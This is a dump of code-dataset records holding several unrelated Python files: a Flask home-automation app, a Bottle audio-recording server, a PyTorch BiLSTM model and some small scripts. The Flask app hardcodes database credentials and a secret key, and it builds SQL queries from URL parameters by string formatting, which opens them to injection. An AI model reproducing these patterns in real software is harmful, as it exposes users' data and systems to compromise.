models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return str(self.timestamp) or \"\"\n\n","sub_path":"askipiikki/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"417012601","text":"from flask import Flask, render_template, request, redirect, url_for, session\nfrom flask_mysqldb import MySQL\nimport MySQLdb.cursors\n\napp = Flask(__name__)\napp.secret_key = '_sbDdEOVwmMzzbn7eROWxg'\napp.config['MYSQL_HOST'] = 'sailasercom.ipagemysql.com'\napp.config['MYSQL_USER'] = 'homeauto'\napp.config['MYSQL_PASSWORD'] = 'Home@123'\napp.config['MYSQL_DB'] = 'home_auto'\nmysql = MySQL(app)\n\n@app.route('/', methods=['GET', 'POST'])\ndef login():\n if 'username' in session:\n username = session['username']\n if session['username'] != \"admin\":\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SELECT COUNT(*) FROM devices WHERE user_id=%s\", (session['id'],))\n property_count = cursor.fetchall()\n return render_template(\"index.html\", user=session['username'],count=property_count)\n else:\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SELECT COUNT(*) FROM users\")\n property_count = cursor.fetchall()\n return render_template(\"index11.html\", count=property_count)\n 
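# No account in the session yet: fall through and validate the credentials posted from the login form.\n    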
elif request.method == 'POST' and 'username' in request.form and 'password' in request.form:\n        username1 = request.form['username']\n        password1 = request.form['password']\n        cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n        cursor.execute('SELECT * FROM users WHERE username = %s AND password = %s', (username1, password1))\n        account = cursor.fetchone()\n        if account is not None and account['username'] == \"admin\":\n            session['loggedin'] = True\n            session['id'] = account['id']\n            session['username'] = account['username']\n            cursor.execute(\"SELECT COUNT(*) FROM users\")\n            property_count = cursor.fetchall()\n            return render_template(\"index11.html\", count=property_count)\n        elif account is not None and account['username'] != \"admin\":\n            session['loggedin'] = True\n            session['id'] = account['id']\n            session['username'] = account['username']\n            cursor.execute(\"SELECT COUNT(*) FROM devices WHERE user_id=%s\", (account['id'],))\n            property_count = cursor.fetchall()\n            return render_template(\"index.html\", user=session['username'], count=property_count)\n        else:\n            msg = 'Incorrect username/password!'\n            return msg\n    else:\n        return render_template(\"page-login.html\")\n\n@app.route(\"/insertredir\")\ndef ins1():\n    cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n    cursor.execute(\"SELECT * FROM home_devices WHERE user_id=%s\", (session['id'],))\n    result = cursor.fetchall()\n    return render_template(\"add_device.html\", len=len(result), print=result)\n\n@app.route('/addrules')\ndef hdform():\n    cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n    cursor.execute(\"SELECT * FROM devices WHERE user_id=%s\",(session['id'],))\n    result = cursor.fetchall()\n    cursor.execute(\"SELECT * FROM home_devices WHERE user_id=%s\", (session['id'],))\n    result1 = cursor.fetchall()\n    return render_template(\"add_rules.html\", string2=result, len=len(result), string3=result1, len1=len(result1))\n\n@app.route('/manageusers')\ndef viewu():\n    if session[\"username\"] == \"admin\":\n        cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n        cursor.execute(\"SELECT * FROM users\")\n        result1 = cursor.fetchall()\n        return render_template(\"view_users.html\", result1 = result1, len=len(result1))\n    else:\n        return \"You are not admin\"\n\n@app.route('/addrulestodb', methods = ['GET','POST'])\ndef artdb():\n    cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n    fvariable = request.form['device']\n    svariable = request.form['appl']\n    con = request.form['con']\n    cursor.execute(\"SELECT * FROM devices WHERE device=%s\",(fvariable,))\n    r1 = cursor.fetchall()\n    cursor.execute(\"SELECT * FROM home_devices WHERE dname=%s\",(svariable,))\n    r2 = cursor.fetchall()\n    r11 = r1[0]['id']\n    r22 = r2[0]['id']\n    cursor.execute(\"INSERT INTO conditions(`user_id`, `imid`, `amid`, `condition`) VALUES(%s, %s, %s, %s)\", (session['id'], r11, r22, con))\n    mysql.connection.commit()\n    return redirect(url_for('viewr'))\n\n@app.route('/homedevice', methods = ['GET','POST'])\ndef ahd():\n    if request.method == 'POST' and 'hdevice' in request.form:\n        hdevice = request.form['hdevice']\n        cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n        cursor.execute(\"INSERT INTO `home_devices`(`user_id`, `dname`) VALUES (%s, %s)\", (session['id'], hdevice))\n        mysql.connection.commit()\n        return redirect(url_for('viewd'))\n\n@app.route(\"/view\")\ndef viewd():\n    cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n    cursor.execute(\"SELECT * FROM devices WHERE user_id=%s\", (session['id'],))\n    result = cursor.fetchall()\n    return render_template(\"view_device.html\", len=len(result), 
string1=result, user=session['username'])\n\n@app.route('/insert', methods = ['GET','POST'])\ndef ins():\n    if request.method == 'POST' and 'device' in request.form and 'ip' in request.form:\n        device = request.form['device']\n        ip = request.form['ip']\n        mac = request.form['mac']\n        cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n        cursor.execute(\"INSERT INTO `devices`(`user_id`, `device`, `mac`, `ip`) VALUES (%s, %s, %s, %s)\", (session['id'], device, mac, ip))\n        mysql.connection.commit()\n        cursor.close()\n        return redirect(url_for('viewd'))\n    else:\n        return str(session['id'])\n\n@app.route('/edit/<editid>')\ndef ed(editid):\n    cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n    cursor.execute(\"SELECT * FROM `devices` WHERE `id`=%s\" %editid,)\n    resultedit = cursor.fetchall()\n    return render_template(\"edit.html\", newvalue=resultedit)\n\n@app.route('/update/<editid1>', methods = ['GET','POST'])\ndef up(editid1):\n    device = request.form['device']\n    ip = request.form['ip']\n    mac = request.form['mac']\n    cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n    cursor.execute(\"UPDATE `devices` SET `device` = %s, `mac` = %s, `ip` = %s WHERE `id` = %s\", (device, mac, ip, editid1))\n    mysql.connection.commit()\n    return redirect(url_for('viewd'))\n\n@app.route('/delete/<delid>')\ndef delete(delid):\n    cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n    cursor.execute(\"DELETE FROM `devices` WHERE id=%s\" %delid)\n    mysql.connection.commit()\n    return redirect(url_for('viewd'))\n\n@app.route('/viewrules')\ndef viewr():\n    cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n    cursor.execute(\"select conditions.id, devices.device, home_devices.dname, conditions.condition from conditions \"\n                   \"INNER JOIN devices on conditions.imid = devices.id INNER JOIN home_devices on conditions.amid = \"\n                   \"home_devices.id WHERE devices.user_id=%s;\", (session['id'],))\n    result = cursor.fetchall()\n    return render_template(\"view_rules.html\", result = result, len = len(result))\n\n@app.route('/ruleupview/<editid>', methods = ['GET','POST'])\ndef ruleup(editid):\n    cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n    cursor.execute(\"SELECT * FROM devices WHERE user_id=%s\", (session['id'],))\n    result = cursor.fetchall()\n    cursor.execute(\"SELECT * FROM home_devices WHERE user_id=%s\", (session['id'],))\n    result1 = cursor.fetchall()\n    cursor.execute(\"SELECT * FROM conditions WHERE id=%s\" %editid)\n    result2 = cursor.fetchall()\n    return render_template(\"edit_rules.html\", result=result, len=len(result), result1=result1, len1=len(result1), result2=result2, len2=len(result2))\n\n@app.route('/updaterules/<editid1>', methods = ['GET','POST'])\ndef uprules(editid1):\n    device = request.form['device']\n    appl = request.form['appl']\n    con = request.form['con']\n    cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n    cursor.execute(\"SELECT * FROM devices WHERE device=%s\", (device,))\n    r1 = cursor.fetchall()\n    cursor.execute(\"SELECT * FROM home_devices WHERE dname=%s\", (appl,))\n    r2 = cursor.fetchall()\n    r11 = r1[0]['id']\n    r22 = r2[0]['id']\n    cursor.execute(\"UPDATE `conditions` SET `user_id` = %s, `imid` = %s, `amid` = %s, `condition` = %s WHERE `id` = %s\", (session['id'], r11, r22, con, editid1))\n    mysql.connection.commit()\n    return redirect(url_for('viewr'))\n\n@app.route('/delrule/<delid>')\ndef delr(delid):\n    cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n    cursor.execute(\"DELETE FROM `conditions` WHERE id=%s\" % delid)\n    mysql.connection.commit()\n    return redirect(url_for('viewr'))\n@app.route('/login/logout')\ndef logout():\n    
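# Clear every auth-related key from the session before sending the user back to the login page.\n    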
session.pop('loggedin', None)\n    session.pop('id', None)\n    session.pop('username', None)\n    return redirect(url_for('login'))\n\n#################################################################admin panel#################################################################\n@app.route('/adminedit/<editid>')\ndef aedit(editid):\n    if session['username'] == \"admin\":\n        cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n        cursor.execute(\"SELECT * FROM `users` WHERE `id`=%s\" % editid, )\n        resultedit = cursor.fetchall()\n        return render_template(\"admin_edit.html\", newvalue=resultedit)\n    else:\n        return render_template(\"page-error-403.html\")\n\n@app.route('/adminupdate/<editid>', methods = ['GET','POST'])\ndef aupdate(editid):\n    if session['username'] == \"admin\":\n        username = request.form['username']\n        email = request.form['email']\n        password = request.form['password']\n        birthdate = request.form['birthdate']\n        gender = request.form['gender']\n        device_id = request.form['device_id']\n        cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n        cursor.execute(\"UPDATE `users` SET `username` = %s, `email` = %s, `password` = %s, `birthdate` = %s, `gender` = %s, `device_id` = %s WHERE `id` = %s\", (username, email, password, birthdate, gender, device_id, editid))\n        mysql.connection.commit()\n        return redirect(url_for('viewu'))\n    else:\n        return render_template(\"page-error-403.html\")\n\n@app.route('/adminadduser1', methods=['GET', 'POST'])\ndef adadd1():\n    if session['username'] == \"admin\":\n        return render_template(\"admin_add_user.html\")\n    else:\n        return render_template(\"page-error-403.html\")\n\n@app.route('/adminadduser2', methods = ['GET','POST'])\ndef adadd2():\n    if session['username'] == 'admin':\n        username = request.form['username']\n        email = request.form['email']\n        password = request.form['password']\n        birthdate = request.form['birthdate']\n        gender = request.form['gender']\n        device_id = request.form['device_id']\n        cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n        cursor.execute(\"INSERT INTO `users`(`username`, `email`, `password`, `birthdate`, `gender`, `device_id`) VALUES (%s, %s, %s, %s, %s, %s)\",(username, email, password, birthdate, gender, device_id,))\n        mysql.connection.commit()\n        return redirect(url_for('viewu'))\n    else:\n        return render_template(\"page-error-403.html\")\n\n@app.route('/admindelete/<delid>')\ndef adelete(delid):\n    if session['username'] == \"admin\":\n        cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n        cursor.execute(\"DELETE FROM `users` WHERE id=%s\" % delid)\n        mysql.connection.commit()\n        return redirect(url_for('viewu'))\n    else:\n        return render_template(\"page-error-403.html\")\n#################################################################admin panel over#################################################################\n\nif __name__ == '__main__':\n    app.run(debug = True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"428093258","text":"#python program to check if number is prime or not#\n\ndef main():\n    \n    num = int(input(\"Enter a number: \"))\n    if num > 1:\n        # check for factors\n        for i in range(2,num):\n            if (num % i) == 0:\n                print(num,\"is not a prime number\\n\")\n                #print(i,\"times\",num//i,\"is\",num)\n                break\n        else:\n            print(num,\"is a prime number\\n\")\n    \n    # if input number is less than\n    # or equal to 1, it is not prime\n    else:\n        print(num,\"is not a prime number\\n\")\n\nif __name__ == \"__main__\":\n    while True:\n        
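# Re-prompt for a new number indefinitely; interrupt with Ctrl+C to exit.\n        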
main()\n\n\n\n","sub_path":"5_prime_nt.py","file_name":"5_prime_nt.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"86383212","text":"import numpy as np\nimport os\n\ndef get_fps(video_name):\n fps = 30\n with open(os.path.join('ActivityNet1.3-Annotations', 'misc_fps.txt'), 'r') as f:\n for line in f:\n line = line.replace('\\n', '').split(' ')\n if line[0] == video_name:\n fps = float(line[1])\n break\n return fps\n\n\n#a = np.load('ActivityNet1.2-Annotations/labels_all.npy', allow_pickle=True)\n#b = np.load('ActivityNet1.2-Annotations/labels.npy', allow_pickle=True)\n\n#for i, j in zip(a, b):\n# if not i == j:\n# print(i, j)\n\n# a = np.load('labels_all.npy', allow_pickle=True)\n#\n#print('a')\n\n# fps_sum = 0\n# count = 0\n# with open(os.path.join(\"data_list\", \"anet1.3_val_fps.txt\"), 'r') as f:\n# for line in f:\n# line = line.replace('\\n', '').split(' ')\n# fps_sum += float(line[1])\n# count += 1\n# print(fps_sum / count)\n\n\n# def gen_classlist():\n# output = []\n# with open(os.path.join(\"data_list\", \"anet13_class.txt\"), 'r') as f:\n# for line in f:\n# class_name = line.replace('\\n', '').split(' ')[1]\n# # class_name = np.array(class_name)\n# output.append(class_name)\n# output = np.array(output)\n# np.save(os.path.join(\"ActivityNet1.3-Annotations\", \"classlist.npy\"), output)\n# print('a')\n#\n# if __name__ == '__main__':\n# gen_classlist()\n\n","sub_path":"debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"2951892","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/techrec/server.py\n# Compiled at: 2019-11-15 16:32:42\nimport os, sys\nfrom datetime import datetime\nimport logging\nfrom functools import partial\nimport unicodedata\nfrom bottle import Bottle, request, static_file, redirect, abort, response\nimport bottle\nlogger = logging.getLogger('server')\nbotlog = logging.getLogger('bottle')\nbotlog.setLevel(logging.INFO)\nbotlog.addHandler(logging.StreamHandler(sys.stdout))\nbottle._stderr = lambda x: botlog.info(x.strip())\nfrom .db import Rec, RecDB\nfrom .processqueue import get_process_queue\nfrom .forge import create_mp3\nfrom .config_manager import get_config\n\ndef date_read(s):\n return datetime.fromtimestamp(int(s))\n\n\ndef date_write(dt):\n return dt.strftime('%s')\n\n\ndef rec_sanitize(rec):\n d = rec.serialize()\n d['starttime'] = date_write(d['starttime'])\n d['endtime'] = date_write(d['endtime'])\n return d\n\n\nclass DateApp(Bottle):\n \"\"\"\n This application will expose some date-related functions; it is intended to\n be used when you need to know the server's time on the browser\n \"\"\"\n\n def __init__(self):\n Bottle.__init__(self)\n self.route('/help', callback=self.help)\n self.route('/date', callback=self.date)\n self.route('/custom', callback=self.custom)\n\n def date(self):\n n = datetime.now()\n return {'unix': n.strftime('%s'), \n 'isoformat': n.isoformat(), \n 'ctime': n.ctime()}\n\n def custom(self):\n n = datetime.now()\n if 'strftime' not in request.query:\n abort(400, 'Need argument \"strftime\"')\n response.content_type = 'text/plain'\n return n.strftime(request.query['strftime'])\n\n def help(self):\n response.content_type = 'text/plain'\n return '/date : get 
JSON dict containing multiple formats of now()\\n' + '/custom?strftime=FORMAT : get now().strftime(FORMAT)'\n\n\nclass RecAPI(Bottle):\n\n    def __init__(self, app):\n        Bottle.__init__(self)\n        self._route()\n        self._app = app\n        self.db = RecDB(get_config()['DB_URI'])\n\n    def _route(self):\n        self.post('/create', callback=self.create)\n        self.post('/delete', callback=self.delete)\n        self.post('/update/<recid>', callback=self.update)\n        self.post('/generate', callback=self.generate)\n        self.get('/help', callback=self.help)\n        self.get('/', callback=self.help)\n        self.get('/get/search', callback=self.search)\n        self.get('/get/ongoing', callback=self.get_ongoing)\n        self.get('/get/archive', callback=self.get_archive)\n        self.get('/jobs', callback=self.running_jobs)\n        self.get('/jobs/<job_id:int>', callback=self.check_job)\n\n    def create(self):\n        req = dict(request.POST.decode().allitems())\n        ret = {}\n        logger.debug('Create request %s ' % req)\n        now = datetime.now()\n        start = date_read(req['starttime']) if 'starttime' in req else now\n        name = req['name'] if 'name' in req else ''\n        end = date_read(req['endtime']) if 'endtime' in req else now\n        rec = Rec(name=name, starttime=start, endtime=end)\n        ret = self.db.add(rec)\n        return self.rec_msg('Nuova registrazione creata! (id:%d)' % ret.id, rec=rec_sanitize(rec))\n\n    def delete(self):\n        req = dict(request.POST.decode().allitems())\n        logging.info('Server: request delete %s ' % req)\n        if 'id' not in req:\n            return self.rec_err('No valid ID')\n        else:\n            if self.db.delete(req['id']):\n                return self.rec_msg('DELETE OK')\n            return self.rec_err('DELETE error: %s' % self.db.get_err())\n\n    def update(self, recid):\n        req = dict(request.POST.decode().allitems())\n        newrec = {}\n        now = datetime.now()\n        if 'starttime' not in req:\n            newrec['starttime'] = now\n        else:\n            newrec['starttime'] = date_read(req['starttime'])\n        if 'endtime' not in req:\n            newrec['endtime'] = now\n        else:\n            newrec['endtime'] = date_read(req['endtime'])\n        if 'name' in req:\n            newrec['name'] = req['name']\n        try:\n            logger.info('prima di update')\n            result_rec = self.db.update(recid, newrec)\n            logger.info('dopo update')\n        except Exception as exc:\n            return self.rec_err('Errore Aggiornamento', exception=exc)\n\n        return self.rec_msg('Aggiornamento completato!', rec=rec_sanitize(result_rec))\n\n    def generate(self):\n        recid = dict(request.POST.decode().allitems())['id']\n        rec = self.db._search(_id=recid)[0]\n        if rec.filename is not None and os.path.exists(rec.filename):\n            return {'status': 'ready', 'message': 'The file has already been generated at %s' % rec.filename, \n                    'rec': rec}\n        else:\n            if get_config()['FORGE_MAX_DURATION'] > 0 and (rec.endtime - rec.starttime).total_seconds() > get_config()['FORGE_MAX_DURATION']:\n                response.status = 400\n                return {'status': 'error', 'message': 'The requested recording is too long' + ' (%d seconds)' % (rec.endtime - rec.starttime).total_seconds()}\n            rec.filename = get_config()['AUDIO_OUTPUT_FORMAT'] % {'time': rec.starttime.strftime('%y%m%d_%H%M'), \n                'endtime': rec.endtime.strftime('%H%M'), \n                'startdt': rec.starttime.strftime('%y%m%d_%H%M'), \n                'enddt': rec.endtime.strftime('%y%m%d_%H%M'), \n                'name': ('').join(filter(lambda c: c.isalpha(), unicodedata.normalize('NFKD', rec.name).encode('ascii', 'ignore').decode('ascii')))}\n            self.db.get_session(rec).commit()\n            job_id = self._app.pq.submit(create_mp3, start=rec.starttime, end=rec.endtime, outfile=os.path.join(get_config()['AUDIO_OUTPUT'], rec.filename), options={'title': rec.name, \n                'license_uri': get_config()['TAG_LICENSE_URI'], \n                'extra_tags': 
get_config()['TAG_EXTRA']})\n logger.debug('SUBMITTED: %d' % job_id)\n return self.rec_msg('Aggiornamento completato!', job_id=job_id, result='/output/' + rec.filename, rec=rec_sanitize(rec))\n\n def check_job(self, job_id):\n try:\n job = self._app.pq.check_job(job_id)\n except ValueError:\n abort(400, 'job_id not valid')\n\n def ret(status):\n return {'job_status': status, 'job_id': job_id}\n\n if job is True:\n return ret('DONE')\n if job is False:\n abort(404, 'No such job has ever been spawned')\n else:\n if job.ready():\n try:\n res = job.get()\n return res\n except Exception as exc:\n r = ret('FAILED')\n r['exception'] = str(exc)\n import traceback\n tb = traceback.format_exc()\n logger.warning(tb)\n if get_config()['DEBUG']:\n r['exception'] = '%s: %s' % (str(exc), tb)\n r['traceback'] = tb\n return r\n\n return ret('WIP')\n\n def running_jobs(self):\n res = {}\n res['last_job_id'] = self._app.pq.last_job_id\n res['running'] = self._app.pq.jobs.keys()\n return res\n\n def search(self, args=None):\n req = dict()\n req.update(request.GET.allitems())\n logger.debug('Search request: %s' % req)\n values = self.db._search(**req)\n from pprint import pprint\n logger.debug('Returned Values %s' % pprint([ r.serialize() for r in values ]))\n ret = {}\n for rec in values:\n ret[rec.id] = rec_sanitize(rec)\n\n logging.info('Return: %s' % ret)\n return ret\n\n def get_ongoing(self):\n return {rec.id:rec_sanitize(rec) for rec in self.db.get_ongoing()}\n\n def get_archive(self):\n return {rec.id:rec_sanitize(rec) for rec in self.db.get_archive_recent()}\n\n def help(self):\n return '
\\n        help\\n\\n\\n        /get, /get/, /get/<id>\\n\\n            Get Info about rec identified by ID\\n\\n        /search, /search/, /search/<key>/<value>\\n\\n            Search rec that match key/value (or get all)\\n\\n        /delete/<id>\\n\\n            Delete rec identified by ID\\n\\n        /update\\n\\n            Not implemented.\\n        
'\n\n    def rec_msg(self, msg, status=True, **kwargs):\n        d = {'message': msg, 'status': status}\n        d.update(kwargs)\n        return d\n\n    def rec_err(self, msg, **kwargs):\n        return self.rec_msg(msg, status=False, **kwargs)\n\n\nclass RecServer:\n\n    def __init__(self):\n        self._app = Bottle()\n        self._app.pq = get_process_queue()\n        self._route()\n        self.db = RecDB(get_config()['DB_URI'])\n\n    def _route(self):\n        self._app.route('/output/<filepath:path>', callback=lambda filepath: static_file(filepath, root=get_config()['AUDIO_OUTPUT'], download=True))\n        self._app.route('/static/<filepath:path>', callback=lambda filepath: static_file(filepath, root=get_config()['STATIC_FILES']))\n        self._app.route('/', callback=lambda : redirect('/new.html'))\n        self._app.route('/new.html', callback=partial(static_file, 'new.html', root=get_config()['STATIC_PAGES']))\n        self._app.route('/old.html', callback=partial(static_file, 'old.html', root=get_config()['STATIC_PAGES']))\n        self._app.route('/archive.html', callback=partial(static_file, 'archive.html', root=get_config()['STATIC_PAGES']))\n\n\nclass DebugAPI(Bottle):\n    \"\"\"\n    This application is useful for testing the webserver itself\n    \"\"\"\n\n    def __init__(self):\n        Bottle.__init__(self)\n        self.route('/sleep/:milliseconds', callback=self.sleep)\n        self.route('/cpusleep/:howmuch', callback=self.cpusleep)\n        self.route('/big/:exponent', callback=self.big)\n\n    def sleep(self, milliseconds):\n        import time\n        time.sleep(int(milliseconds) / 1000.0)\n        return 'ok'\n\n    def cpusleep(self, howmuch):\n        out = ''\n        for i in xrange(int(howmuch) * 1000):\n            if i % 11234 == 0:\n                out += 'a'\n\n        return out\n\n    def big(self, exponent):\n        \"\"\"\n        returns a 2**n -1 string\n        \"\"\"\n        for i in xrange(int(exponent)):\n            yield str(i) * 2 ** i\n\n    def help(self):\n        response.content_type = 'text/plain'\n        return '\\n    /sleep/<milliseconds> : sleep, then say \"ok\"\\n    /cpusleep/<howmuch> : busysleep, then say \"ok\"\\n    /big/<exponent> : returns a 2**n -1 byte content\\n    '\n\n\nclass PasteLoggingServer(bottle.PasteServer):\n\n    def run(self, handler):\n        from paste import httpserver\n        from paste.translogger import TransLogger\n        handler = TransLogger(handler, **self.options['translogger_opts'])\n        del self.options['translogger_opts']\n        httpserver.serve(handler, host=self.host, port=str(self.port), **self.options)\n\n\nbottle.server_names['pastelog'] = PasteLoggingServer\n\ndef main_cmd(*args):\n    \"\"\"meant to be called from argparse\"\"\"\n    c = RecServer()\n    c._app.mount('/date', DateApp())\n    c._app.mount('/api', RecAPI(c._app))\n    if get_config()['DEBUG']:\n        c._app.mount('/debug', DebugAPI())\n    server = get_config()['WSGI_SERVER']\n    if server == 'pastelog':\n        from paste.translogger import TransLogger\n        get_config()['WSGI_SERVER_OPTIONS']['translogger_opts'] = get_config()['TRANSLOGGER_OPTS']\n    c._app.run(server=server, host=get_config()['HOST'], port=get_config()['PORT'], debug=get_config()['DEBUG'], quiet=True, **get_config()['WSGI_SERVER_OPTIONS'])\n\n\nif __name__ == '__main__':\n    from cli import common_pre\n    common_pre()\n    logger.warn('Usage of server.py is deprecated; use cli.py')\n    main_cmd()","sub_path":"pycfiles/techrec-1.2.0-py2.7/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":11959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"354457227","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\n\nclass BiLSTM(nn.Module):\n\n    def __init__(self, config):\n        super(BiLSTM, self).__init__()\n        self.config = config\n\n        self.lstm 
= nn.LSTM(input_size=config.d_embedding, hidden_size=config.d_hidden,\n num_layers=config.n_layers, dropout=config.dropout_prob,\n bidirectional=config.birnn, batch_first=True)\n\n # linear layer maps from hidden state space to label space\n self.hidden2label = nn.Linear(config.n_layers*config.n_directions*config.d_hidden, config.d_out)\n self.hidden = self.init_hidden()\n # self.dropout = nn.Dropout(p=config.dropout_prob)\n # self.log_softmax = nn.LogSoftmax()\n\n\n def init_hidden(self):\n # axes semantics are (num_layers, batch_size, hidden_dim)\n n_layers = self.config.n_layers * self.config.n_directions\n return (Variable(torch.zeros(n_layers, self.config.batch_size, self.config.d_hidden)),\n Variable(torch.zeros(n_layers, self.config.batch_size, self.config.d_hidden)))\n\n # embeds is Variable of size - (|B|, |S|, |D|)\n def forward(self, embeds):\n batch_size = embeds.data.size()[0]\n sequence_length = embeds.data.size()[1]\n lstm_out, self.hidden = self.lstm(embeds, self.hidden)\n # print(\"ht size: {}\".format(ht.size()))\n rel_space = self.hidden2label(self.hidden[0].transpose(0, 1).contiguous().view(batch_size, -1)) # size - (|B|, |K|)\n scores = F.log_softmax(rel_space)\n return scores\n","sub_path":"simple_qa_rnn/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"176412122","text":"import os\nimport time\nfrom tqdm import tqdm\nfrom random import randint\n\nfor edge_num in range(3000, 3001, 10):\n with open(\"5in.txt\", \"w+\") as f:\n f.write(str(edge_num) + '\\n')\n start = randint(0, 50)\n for count in range(int(edge_num/5)):\n if count < 10:\n v = start * (count + 1)\n else:\n v = start * (randint(10, 20))\n for v_time in range(5):\n x = str(randint(0, 50))\n f.write(str(v) + ' ' + x + ' ' + str(randint(10000, 100000)) + '\\n')\n\n f.write(str(start) + '\\n')\n f.write(x + '\\n')\n\n # yxm = os.popen(\"python3 Dijkstra.py < 5in.txt\").read()\n # print(yxm)\n","sub_path":"lab/lab4/testGraph.py","file_name":"testGraph.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"487607385","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 15 11:44:25 2018\n\n@author: qxb-810\n\"\"\"\nfrom __future__ import print_function\nimport os\nimport re\nfrom tqdm import tqdm\nfrom array import array\nimport numpy as np\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\nfilename_pattern='slurm-[0-9]*.out'\ncontent_pattern='TIMESTEP ([0-9]*) / STATE ([a-z]*) / EPSILON (-?\\d+\\.?\\d*e?-?\\d+?) 
/ EPISODE ([0-9]*) / ACTION [0-9] / REWARD (-?[.0-9]*)'\n\nstep=array('i')\nepsilon=array('d')\nreward=array('d')\n\neval_episode=array('i')\neval_reward=array('d')\n\nprint('Scanning directory for log file...')\nfor f in os.listdir('.'):\n\tif re.match(filename_pattern,f):\n\t\tprint('Find:',f)\n\t\twith open(f) as file:\n\t\t\ttry:\n\t\t\t\tfor line in tqdm(file):\n\t\t\t\t\tif re.match(content_pattern,line):\n\t\t\t\t\t\tm=re.match(content_pattern,line)\n\t\t\t\t\t\tepisode=int(m.group(4))\n\t\t\t\t\t\tstate=m.group(2)\n\t\t\t\t\t\tr=float(m.group(5))\n\t\t\t\t\t\tif state=='explore' or state=='observe' or state=='train':\n\t\t\t\t\t\t\tif episode==len(step):\n\t\t\t\t\t\t\t\tstep.append(int(m.group(1)))\n\t\t\t\t\t\t\t\tepsilon.append(float(m.group(3)))\n\t\t\t\t\t\t\t\treward.append(0 if r<0 else r)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\treward[episode]+=(0 if r<0 else r)\n\t\t\t\t\t\telif state=='evaluate':\n\t\t\t\t\t\t\tif len(eval_episode)==0 or eval_episode[-1]!=episode:\n\t\t\t\t\t\t\t\teval_episode.append(episode)\n\t\t\t\t\t\t\t\teval_reward.append(0 if r<0 else r)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\teval_reward[-1]+=(0 if r<0 else r)\n\t\t\t\t\t\t\t\n\t\t\texcept KeyboardInterrupt:\n\t\t\t\tprint('Interrupted, ignoring the following data...')\n\t\t\t\tpass\n\t\t\tfinally:\n\t\t\t\twith open(\"episode-reward-%i.txt\"%episode,'w') as result_file:\n\t\t\t\t\tfor e in zip(eval_episode,np.array(eval_reward)/10):\n\t\t\t\t\t\tprint('Episode: %i, Average reward: %d'%e,file=result_file)\n\t\t\t\tplt.figure(1)\n\t\t\t\tx=range(len(step))\n\t\t\t\tplt.plot(x,step)\n\t\t\t\tplt.savefig(\"episode-step-%i.jpg\"%episode)\n\t\t\t\tplt.figure(2)\n\t\t\t\tx=range(len(epsilon))\n\t\t\t\tplt.plot(x,epsilon)\n\t\t\t\tplt.savefig(\"episode-epsilon-%i.jpg\"%episode)\n\t\t\t\tplt.figure(3)\n\t\t\t\tx=range(len(reward))\n\t\t\t\tplt.scatter(x,reward,marker='.')\n\t\t\t\tplt.savefig(\"episode-reward-%i.jpg\"%episode)\n\t\t\t\tplt.figure(4)\n\t\t\t\tplt.plot(eval_episode,np.array(eval_reward)/10)\n\t\t\t\tplt.savefig(\"episode-reward-eval-%i.jpg\"%episode)\n\t\t","sub_path":"DRL-Breakout/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"15497540","text":"import load\nimport numpy as np\nfrom expression import get_chosen_word_problems\nfrom typing import List, TYPE_CHECKING, Set, Dict\n\nif TYPE_CHECKING:\n from loader import Loader\n\n\ndef prepare_data(loader: 'Loader', chosen: List = None, directory: str = './dataset/WP500/traindata',\n count=None) -> 'Data':\n \"\"\"\n Prepares single data for genetic algorithm or solver.\n :param count: Specifies count of word problems in directory.\n :param loader: Instance of class 